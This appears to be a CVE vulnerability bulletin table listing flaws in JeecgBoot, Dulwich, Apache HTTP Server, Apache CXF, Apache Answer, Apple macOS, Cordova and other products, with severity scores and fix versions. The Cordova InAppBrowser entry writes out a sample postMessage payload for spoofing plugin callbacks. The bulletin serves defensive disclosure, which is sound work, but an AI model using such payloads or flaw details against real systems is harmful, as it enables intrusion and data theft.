| JeecgBoot--JeecgBoot | A weakness has been identified in JeecgBoot up to 3.9.2. Impacted is the function HttpServletResponse.sendRedirect of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/ThirdLoginController.java of the component Third-Party Login. This manipulation of the argument state causes open redirect. The attack can be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The project replied: "After evaluation, this vulnerability has low exploitability in real-world scenarios: 1) Exploiting this vulnerability requires attackers to use social engineering techniques to induce victims to actively click on an OAuth login link constructed by the attacker; it cannot be triggered passively. 2) Third-party login (DingTalk/WeChat, etc.) is an optional feature and may not be enabled in most projects." | 2026-06-08 | 3.1 | CVE-2026-11502 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, dulwich.porcelain.format_patch(outdir=...) derives each patch filename from the commit's subject line. Prior to this fix, get_summary only replaced spaces with dashes - path separators (/, \), parent-directory components (..), and other filename-hostile characters (e.g. :) were preserved verbatim and passed straight into os.path.join(outdir, f"{i:04d}-{summary}.patch"). A malicious commit subject could therefore direct the generated patch file outside the requested outdir. This is fixed in Dulwich 1.2.5. Users should upgrade to 1.2.5 or later. dulwich.patch.get_summary now mirrors git's format_sanitized_subject: only `[A-Za-z0-9._]` are kept, runs of other characters collapse to a single -, consecutive . collapse to a single ., trailing ./- are stripped, and the result is length-limited. This makes the returned string safe to embed as a filename component, so format_patch can no longer be steered out of outdir via the commit subject. Until upgrading, callers that pass untrusted commits to porcelain.format_patch can use stdout=True and write the patch to a destination they control, rather than letting format_patch choose the filename; validate the chosen path before opening - e.g. compare os.path.realpath(returned_path) against os.path.realpath(outdir) and reject any patch whose resolved path is not inside outdir; and/or pre-screen commits and refuse to format any whose subject's first line contains /, \, .., or other characters that are not safe on the target filesystem. | 2026-06-10 | 3.3 | CVE-2026-47712 |
| kokke--tiny-regex-c | A flaw has been found in kokke tiny-regex-c up to f2632c6d9ed25272987471cdb8b70395c2460bdb. This vulnerability affects the function matchstar of the file re.c of the component Pattern Handler. This manipulation causes inefficient regular expression complexity. The attack is restricted to local execution. The exploit has been published and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 3.3 | CVE-2026-11478 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 3.3 | CVE-2026-45455 |
| Microsoft--Microsoft 365 Apps for Enterprise | Protection mechanism failure in Microsoft Office Excel allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 3.3 | CVE-2026-45459 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 3.3 | CVE-2026-45466 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 3.3 | CVE-2026-45485 |
| Microsoft--Windows 10 Version 1607 | Improper input validation in Microsoft Azure Attestation service and Device Health Attestation Service allows an authorized attacker to perform spoofing with a physical attack. | 2026-06-09 | 3.9 | CVE-2026-45642 |
| nationalsecurityagency--ghidra | Ghidra before 12.1 contains a path traversal vulnerability in SameDirDebugInfoProvider that fails to validate filenames from ELF binary .gnu_debuglink sections before constructing file paths. Attackers can craft malicious ELF binaries with traversal sequences to probe filesystem existence and leak CRC32 hashes of arbitrary files during automatic DWARF analysis. | 2026-06-10 | 3.3 | CVE-2026-49497 |
| nationalsecurityagency--ghidra | Ghidra before 11.2 contains a use after free vulnerability in the Sleigh backend caused by undefined static initialization order of the SleighArchitecture::translators and XmlArchitectureCapability singletons. Attackers can trigger an infinite loop or denial of service during shutdown by exploiting the unsafe destruction order that causes iteration over deallocated memory. | 2026-06-10 | 2.9 | CVE-2024-58350 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.25 contains a policy bypass vulnerability in embedded runner policy that allows requests using provider aliases to compare against aliases instead of canonical provider identities. Attackers can exploit this confusion to select bundled tool access outside intended provider policy restrictions when the affected feature is enabled. | 2026-06-11 | 3.8 | CVE-2026-53809 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.6 contains an improper access control vulnerability in Mattermost event handlers that fails to validate channel type metadata. Attackers can bypass intended DM policy decisions by sending crafted Mattermost events missing channel type information to process restricted content. | 2026-06-12 | 3.7 | CVE-2026-53837 |
| Red Hat--Red Hat Directory Server 11 | A heap buffer overflow flaw was found in 389 Directory Server. When audit logging is enabled, the create_masked_entry_string() function in auditlog.c copies a fixed-length password mask into a precisely-sized heap buffer without checking available space. If a short cleartext password is logged (requiring non-default CLEAR password storage or a compromised replication peer), the copy overflows the buffer, corrupting heap memory and audit log output. | 2026-06-09 | 3.3 | CVE-2026-11792 |
| Red Hat--Red Hat Directory Server 11 | A flaw was found in 389 Directory Server. The LDIF parser reads past the end of a heap buffer when processing attribute types with trailing semicolons during database import, causing an out-of-bounds read detectable under memory instrumentation. | 2026-06-09 | 1.9 | CVE-2026-11786 |
| rikyoz--bit7z | bit7z is a cross-platform C++ static library that allows the compression/extraction of archive files. Prior to version 4.0.12, a one-byte off-by-one error in SafeOutPathBuilder::restoreSymlink() allows an attacker to craft a .7z archive that, when extracted with bit7z on any non-Windows platform, creates a symlink escaping the intended output directory. Subsequent archive entries extracted through this symlink write arbitrary files outside the extraction directory with the permissions of the extracting process. This issue has been patched in version 4.0.12. | 2026-06-10 | 3.6 | CVE-2026-45380 |
| SAP_SE--SAP Business Objects | Under certain conditions, when an unauthorized attacker accesses a specific endpoint, SAP Business Objects application leaks sensitive information .This has a low impact on the confidentiality of the data. There is no impact on integrity and availability of the application. | 2026-06-09 | 3.7 | CVE-2026-44743 |
| shopware--shopware | Shopware is an open commerce platform. Prior to versions 6.6.10.18 and 6.7.10.1, an attacker is able to enumerate the usernames of administrator users by performing a timing attack. Versions 6.6.10.18 and 6.7.10.1 fix the issue. | 2026-06-10 | 3.7 | CVE-2026-48011 |
| SourceCodester--Inventory System | A weakness has been identified in SourceCodester Inventory System 1.0. Affected by this issue is some unknown functionality of the file header.php. This manipulation causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Multiple parameters might be affected. | 2026-06-08 | 3.5 | CVE-2026-11520 |
| Spring--Spring Framework | Applications may be vulnerable to a Regular Expression Denial of Service (ReDoS) attack if an attacker is able to provide a pattern which is then directly or indirectly supplied to one of the following methods in AntPathMatcher: match(String pattern, String path), matchStart(String pattern, String path), extractUriTemplateVariables(String pattern, String path). Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 3.7 | CVE-2026-41848 |
| Spring--Spring Framework | A vulnerability in Spring Expression Language (SpEL) evaluation logic allows for arbitrary zero-argument method invocation, even within restricted or read-only contexts, which may allow an attacker to invoke unintended application logic. Affected versions: Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48. | 2026-06-09 | 3.7 | CVE-2026-41852 |
| Spring--Spring Security | Since Spring Security SAML decrypts SAML Responses as well as elements of SAML LogoutRequests and LogoutResponses without requiring a valid signature, attackers may be able to craft these SAML payloads and use the Service Provider as a decryption oracle. Affected versions: Spring Security 5.7.0 through 5.7.23; 5.8.0 through 5.8.25; 6.3.0 through 6.3.16; 6.4.0 through 6.4.16; 6.5.0 through 6.5.10; 7.0.0 through 7.0.5. | 2026-06-09 | 3.7 | CVE-2026-41694 |
| Spring--Spring Web Services | Wss4jSecurityInterceptor did not consistently wire Apache WSS4J ReplayCache instances into RequestData for validation-time checks. As a result, protections against replay of UsernameToken nonces and creation timestamps, Timestamp elements, and certain SAML one-time-use semantics could be ineffective even when operators configured a replay cache on the interceptor. Affected versions: Spring Web Services 5.0.0 through 5.0.1; 4.1.0 through 4.1.3; 4.0.0 through 4.0.18; 3.1.0 through 3.1.8. | 2026-06-11 | 3.7 | CVE-2026-41000 |
| TwiN--gatus | A vulnerability was determined in TwiN gatus 5.36.0. Impacted is the function setSessionCookie of the file security/oidc.go of the component OIDC Session Cookie Handler. Executing a manipulation can lead to sensitive cookie without secure attribute. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The reported GitHub issue was closed with the label "not planned". | 2026-06-11 | 3.7 | CVE-2026-11956 |
| yoanbernabeu--grepai | A vulnerability was determined in yoanbernabeu grepai up to 0.35.0. The affected element is the function PostgresStore.LookupByContentHash of the file indexer/chunker.go of the component Postgres Embedding Cache. Executing a manipulation of the argument content_hash can lead to use of weak hash. The attack needs to be launched locally. The attack requires a high level of complexity. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. The pull request to fix this issue awaits acceptance. | 2026-06-08 | 2.5 | CVE-2026-11481 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| actualbudget--actual | Actual is a local-first personal finance tool. The `POST /openid/config` endpoint in Actual Budget's sync-server versions <= 26.4.0 exposes the full OpenID Connect configuration-including the OAuth2 `client_secret`-to any caller who knows the bootstrap password. The endpoint also lacks authentication and rate limiting, making the bootstrap password brute-forceable. Version 26.5.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-42604 |
| actualbudget--actual | Actual is an open-source personal finance application. In the macOS desktop application version 25.x (built on Electron 39.2.7), the ELECTRON_RUN_AS_NODE fuse is not disabled, allowing an attacker who can place a file on disk or control command-line arguments to invoke the signed Actual.app binary with the ELECTRON_RUN_AS_NODE=1 environment variable set. This converts the application into a Node.js REPL capable of executing arbitrary code that inherits the application's entitlements and code signature, bypassing macOS Gatekeeper review. Version 26.5.0 patches the issue. | 2026-06-12 | not yet calculated | CVE-2026-42890 |
| actualbudget--actual | Actual is an open-source personal finance application. Prior to version 26.5.0, several endpoints are affected by a path traversal vulnerability. Version 26.5.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-43872 |
| AgentChat--AgentChat | An information disclosure vulnerability in the /api/v1/user/info endpoint of AgentChat v2.3.0 allows unauthenticated attackers to obtain sensitive information, including SHA256 password hashes, via enumerating user IDs. | 2026-06-09 | not yet calculated | CVE-2026-36719 |
| agenticmail--agenticmail | AgenticMail gives AI agents real email addresses and phone numbers. Prior to version 0.9.27, @agenticmail/mcp exposes a Streamable HTTP transport when started with --http or MCP_HTTP=1. In that mode, the /mcp endpoint accepts requests without any HTTP authentication layer. A remote client can initialize a session and call tools directly. This issue has been patched in version 0.9.27. | 2026-06-12 | not yet calculated | CVE-2026-50287 |
| Aix-DB--Aix-DB | A missing authentication check on the Aix‘DB "/llm/process_llm_out" endpoint allows unauthenticated clients to execute arbitrary "SELECT" SQL queries and retrieve database data, as the endpoint lacks the token validation enforced on all other application endpoints. All releases up to 1.2.4 are considered vulnerable. Status of next releases is unknown as the vulnerability has not been addressed by any patch. | 2026-06-10 | not yet calculated | CVE-2026-8335 |
| Allegra--Allegra | Allegra exportReport Directory Traversal Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Allegra. Authentication is required to exploit this vulnerability. The specific flaw exists within the exportReport method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the service account. Was ZDI-CAN-28208. | 2026-06-12 | not yet calculated | CVE-2026-11442 |
| Allegra--Allegra | Allegra downloadAttachment Cross-Site Scripting Authentication Bypass Vulnerability. This vulnerability allows remote attackers to execute arbitrary script on affected installations of Allegra. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the downloadAttachment method. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of arbitrary script. An attacker can leverage this vulnerability to execute script in the context of the current user. Was ZDI-CAN-28236. | 2026-06-12 | not yet calculated | CVE-2026-11443 |
| AMD--AMD EPYC 9004 Series Processors | Improper access control for register interface in the input-output memory management unit (IOMMU) could allow a privileged attacker to cause non-coherent accesses by the AMD secure processor (ASP) potentially resulting in loss of integrity. | 2026-06-09 | not yet calculated | CVE-2025-54509 |
| AMD--AMD Management Console (AMC) | The use of insecure HTTP transport within AMD optional tools could allow an attacker to conduct a man-in-the-middle attack, potentially leading to arbitrary code execution. | 2026-06-12 | not yet calculated | CVE-2026-40677 |
| AMD--AMD Prof | Improper access control in AMD uProf may allow a local attacker with user privileges to write to the kernel-shared memory section, potentially resulting in crash or denial of service. | 2026-06-09 | not yet calculated | CVE-2026-0466 |
| AMD--AMD Prof | Unrestricted resource allocation in AMD uProf may be exploitable to consume excessive system resources, potentially leading to a loss of availability. | 2026-06-09 | not yet calculated | CVE-2026-28237 |
| Apache Software Foundation--Apache Airflow Samba provider | The Apache Airflow Samba provider's `GCSToSambaOperator` joined GCS object names to the SMB destination path without a containment check, so an object named with `../` segments resolved a write path outside the configured `destination_path`. An attacker able to write objects into the source GCS bucket - typically an external data producer distinct from the trusted DAG author - could write files to arbitrary locations on the Samba target when the operator ran. Upgrade apache-airflow-providers-samba to 4.12.6 or later, which validates the resolved destination stays within `destination_path`. | 2026-06-09 | not yet calculated | CVE-2026-49818 |
| Apache Software Foundation--Apache Answer | Improper Neutralization of Alternate XSS Syntax vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. AI-generated response content was rendered in the browser without proper sanitization, allowing malicious scripts to be executed when the content was viewed. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-25688 |
| Apache Software Foundation--Apache Answer | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. Timeline-related APIs lacked proper authorization checks, allowing regular authenticated users to access deleted, private, or unapproved content and its revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-25699 |
| Apache Software Foundation--Apache Answer | Improper Restriction of Security Token Assignment vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. Previously issued administrative tokens were not invalidated after an administrator account was suspended, deleted, or deactivated, allowing continued access to administrative APIs until the token expired. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-25700 |
| Apache Software Foundation--Apache Answer | Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. A crafted TIFF image could trigger excessive memory allocation during image decoding, allowing an authenticated user to cause the server process to crash. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-33582 |
| Apache Software Foundation--Apache Answer | Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The server did not sufficiently validate user-supplied image URLs, allowing arbitrary external content to be embedded as profile images, which could expose users to unintended external requests and tracking by third-party servers. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34031 |
| Apache Software Foundation--Apache Answer | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. User-supplied content was included in notification emails without proper escaping, allowing authenticated users to inject arbitrary HTML into emails sent to other users. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34033 |
| Apache Software Foundation--Apache Answer | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 2.0.0. The unlisted question feature did not enforce access restrictions on direct API endpoints, allowing authenticated users to discover and access unlisted questions, their answers, comments, and revision history. Users are recommended to upgrade to version 2.0.1, which fixes the issue. | 2026-06-09 | not yet calculated | CVE-2026-34905 |
| Apache Software Foundation--Apache CXF | Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. | 2026-06-12 | not yet calculated | CVE-2026-49875 |
| Apache Software Foundation--Apache CXF | An authentication bypass vulnerability exists in the OAuth2 TokenIntrospectionService in Apache CXF. Due to a missing 'throw' keyword in the security context check, the introspection endpoint (/services/oauth2/introspect) can be accessed by any unauthenticated network attacker. However note that this is a safeguard only in the case that someone forgot to enable authentication on the service. Users are recommended to upgrade to version 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50623 |
| Apache Software Foundation--Apache CXF | The JwtAccessTokenValidator class in Apache CXF fails to validate the 'aud' (Audience) claims of incoming JWT access tokens. This allows a JWT issued for one Resource Server to be successfully replayed against a completely different Resource Server, leading to Token Confusion/Routing attacks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50627 |
| Apache Software Foundation--Apache CXF | A logic error in OAuthRequestFilter rejects legitimate requests originating from the bound IP address, while blindly allowing requests from any other IP address. Enabling this security feature inadvertently creates an inverse security check. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50628 |
| Apache Software Foundation--Apache CXF | The 'clientId' parameter from incoming HTTP requests is directly concatenated into OAuth2 server log warning messages without sanitizing control characters. This allows an attacker to inject arbitrary content, including fake log entries, into the server's log files. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50629 |
| Apache Software Foundation--Apache CXF | A CRLF injection vulnerability exists in the OAuth2 AuthorizationUtils class. When constructing the WWW-Authenticate response header, the 'realm' parameter is concatenated without sanitizing Carriage Return (CR) and Line Feed (LF) characters. If an attacker can control the realm value, they can inject arbitrary HTTP headers or split the HTTP response entirely. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50630 |
| Apache Software Foundation--Apache CXF | A race condition in AbstractOAuthDataProvider allows concurrent requests using the same Refresh Token to bypass single-use semantics and generate multiple valid Access Tokens, when 'recycleRefreshTokens' is set to false. A leaked refresh token can be replayed concurrently by multiple attackers or threads. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50631 |
| Apache Software Foundation--Apache CXF | A further incomplete fix for a previous advisory CVE-2026-44417 (Untrusted JMS configuration can lead to RCE) for Apache CXF has been identified, which can allow code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50632 |
| Apache Software Foundation--Apache CXF | A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue. | 2026-06-12 | not yet calculated | CVE-2026-50633 |
| Apache Software Foundation--Apache CXF | A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be exploited to cause CXF to process metadata that was not authenticated by the accepted signature. This can bypass the application's assumption that accepted `Content-Type` or protected HTTP-header metadata came from a verified signature entry, and may steer downstream JAX-RS entity parsing or signed-header consistency checks. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue. | 2026-06-12 | not yet calculated | CVE-2026-50634 |
| Apache Software Foundation--Apache CXF | There is no restriction on the amount of attachment headers that a message can contain when being deserialized by Apache CXF, which can lead to uncontrolled resource consumption or a denial of service attack. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue by imposing a maximum default of 500 attachments per message. | 2026-06-12 | not yet calculated | CVE-2026-50645 |
| Apache Software Foundation--Apache HTTP Server | Use After Free vulnerability in Apache HTTP Server with mod_ldap in per-directory configuration This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-29167 |
| Apache Software Foundation--Apache HTTP Server | A cross-site scripting vulnerability exists in mod_proxy_ftp's HTML directory list generation in Apache HTTP Server 2.4.67 and earlier when listing FTP directory contents either via forward or reverse proxy configuration. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-29170 |
| Apache Software Foundation--Apache HTTP Server | A buffer overflow in mod_proxy_html in Apache HTTP Server 2.4.67 and earlier allows an attack by an untrusted backend. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-34355 |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in Apache HTTP Server with malicious backend servers and ProxyPassReverseCookie* This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-34356 |
| Apache Software Foundation--Apache HTTP Server | A path handling issue in mod_dav_fs in Apache 2.4.67 and earlier allows a WebDAV content author to directly manipulate trusted DAV property databases, potentially causing child process crashes. Users are recommended to upgrade to version 2.4.68, which fixes this issue. | 2026-06-08 | not yet calculated | CVE-2026-42535 |
| Apache Software Foundation--Apache HTTP Server | Heap-based Buffer Overflow vulnerability in Apache HTTP Server with mod_xml2enc, xml2StartParse, and untrusted content This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-42536 |
| Apache Software Foundation--Apache HTTP Server | Out-of-bounds Read vulnerability in Apache HTTP Server with mod_headers and mod_mime and multiple response languages. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-43951 |
| Apache Software Foundation--Apache HTTP Server | Improper Privilege Management vulnerability in Apache HTTP Server 2.4.67 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. This issue affects Apache HTTP Server: from through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44119 |
| Apache Software Foundation--Apache HTTP Server | Buffer Over-read vulnerability in Apache HTTP Server via outbound OCSP requests to an attacker controlled OCSP server This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44185 |
| Apache Software Foundation--Apache HTTP Server | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the mod_proxy_ftp module in Apache HTTP Server with an attacker controlled backend FTP server. This issue affects undefined: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44186 |
| Apache Software Foundation--Apache HTTP Server | Buffer Underwrite vulnerability in Apache HTTP Server on crafted regular expressions in the configuration. This issue affects Apache HTTP Server: from 2.4.0 through 2.4.67. Users are recommended to upgrade to version 2.4.68, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-44631 |
| Apache Software Foundation--Apache HTTP Server | Use After Free vulnerability in Apache HTTP Server module mod_http2 when file handles are already exhausted. This issue affects Apache HTTP Server: from 2.4.55 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-48913 |
| Apache Software Foundation--Apache HTTP Server | Memory Allocation with Excessive Size Value vulnerability in Apache HTTP Server's mod_http leads to denial of service via malicious HTTP requests. This issue affects Apache HTTP Server: from 2.4.17 through 2.4.67. | 2026-06-08 | not yet calculated | CVE-2026-49975 |
| Apache Software Foundation--Apache OFBiz | A privilege escalation vulnerability in Apache OFBiz allows a low-privileged authenticated user to obtain higher privileges This issue affects Apache OFBiz: before 24.09.07. Users are recommended to upgrade to version 24.09.07, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-47342 |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz allows a low-privileged authenticated user with Content/DataResource editing privileges to perform template injection attacks that could lead to Remote Code Execution. This issue affects Apache OFBiz: before 24.09.07. Users are recommended to upgrade to version 24.09.07, which fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-50223 |
| Apache Software Foundation--Cordova Plugin InAppBrowser | ## Summary The iOS implementation of `cordova-plugin-inappbrowser` passes the `id` field from a `WKScriptMessage` body to `commandDelegate sendPluginResult:callbackId:` with no format validation (`CDVWKInAppBrowser.m:560-574`). Any web content loaded inside the InAppBrowser can fire any pending Cordova callback in the host app by posting a message whose `id` field is a guessable or enumerated callback identifier. An attack abusing this weakness must be tailored to the specific plugins and callback IDs the host app uses. Though an attacker with knowledge of common Cordova plugin configurations could craft reusable payloads targeting widely-adopted plugins. ## Impact An unauthenticated remote attacker who controls content displayed in the InAppBrowser - via a URL the app opens (OAuth redirect, marketing link, deep-link target) or a network interception - can call `window.webkit.messageHandlers.cordova_iab.postMessage({id: '<victim-callback-id>', d: '...'})` to fire callbacks belonging to any other installed Cordova plugin (Camera, Contacts, File, Geolocation). Cordova callback IDs follow the predictable format `<PluginName><sequential-integer>`, making enumeration feasible. Successful exploitation allows the attacker to spoof plugin results across trust boundaries - for example, injecting a forged camera approval, a fabricated contacts list, or a crafted file-read response. This issue affects Cordova Plugin InAppBrowser: from 3.1.0 through 6.0.0. Users are recommended to upgrade to version 6.0.1, which fixes the issue. | 2026-06-08 | not yet calculated | CVE-2026-47430 |
| apify--crawlee-python | Crawlee is a web scraping and browser automation library. From version 1.0.0 to before version 1.7.0, Crawlee is vulnerable to SSRF via sitemap-derived URLs. This issue has been patched in version 1.7.0. | 2026-06-10 | not yet calculated | CVE-2026-46497 |
| apostrophecms--apostrophe | ApostropheCMS is an open-source Node.js content management system. Versions up to and including 4.29.0 are vulnerable to stored cross-site scripting via unsanitized user display name in draft version tooltip. As of time of publication, no known patched versions are available. | 2026-06-12 | not yet calculated | CVE-2026-45014 |
| Apple--iOS and iPadOS | An authorization issue was addressed with improved state management. This issue is fixed in iOS 18.4 and iPadOS 18.4, macOS Sequoia 15.4. An app may be able to leak sensitive user information. | 2026-06-11 | not yet calculated | CVE-2025-46308 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.4, macOS Sonoma 14.7.5, macOS Ventura 13.7.5. An app may be able to cause unexpected system termination. | 2026-06-11 | not yet calculated | CVE-2025-24165 |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.4. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-24268 |
| Apple--macOS | This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Sequoia 15.4. An app may be able to break out of its sandbox. | 2026-06-11 | not yet calculated | CVE-2025-24284 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, macOS Sonoma 14.7.5, macOS Ventura 13.7.5. A malicious app may be able to access private information. | 2026-06-11 | not yet calculated | CVE-2025-30431 |
| Apple--macOS | A privacy issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sequoia 15.4. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-30459 |
| Apple--macOS | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4. An app may be able to bypass launch constraint protections and execute malicious code with elevated privileges. | 2026-06-11 | not yet calculated | CVE-2025-31272 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.4. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-43278 |
| Apple--macOS | An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Tahoe 26.1. A malicious app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-43339 |
| Apple--macOS | This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Sequoia 15.4. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-46293 |
| Apple--macOS | A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.1. An app may be able to access sensitive user data. | 2026-06-11 | not yet calculated | CVE-2025-46313 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.1. An app may be able to access protected user data. | 2026-06-11 | not yet calculated | CVE-2025-46315 |
| Apple--macOS Monterey | A malicious application may cause unexpected changes in memory shared between processes. A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.4. | 2026-06-10 | not yet calculated | CVE-2022-26758 |
| Apple--macOS Monterey | A person with access to a Mac may be able to bypass Login Window. A consistency issue was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4. | 2026-06-10 | not yet calculated | CVE-2022-48575 |
| Arm--C1-Ultra | Arm C1-Ultra, C1-Premium, Neoverse V3 & V3AE, Neoverse V2, Neoverse V1, Neoverse-N2, Neoverse-N1, Cortex-X925, Cortex-X4, Cortex-X3, Cortex-X2, Cortex-X1 & X1C, Cortex-A710, Cortex-A78, A78AE & A78C, Cortex-A77, Cortex-A76 & A76A may allow writes to resources owned by a higher exception level. | 2026-06-09 | not yet calculated | CVE-2025-10263 |
| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl are vulnerable to timing attacks. These versions use Perl's built-in eq comparison. Discrepancies in timing could be used to guess the underlying derived-key. | 2026-06-12 | not yet calculated | CVE-2017-20240 |
| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. | 2026-06-12 | not yet calculated | CVE-2026-9638 |
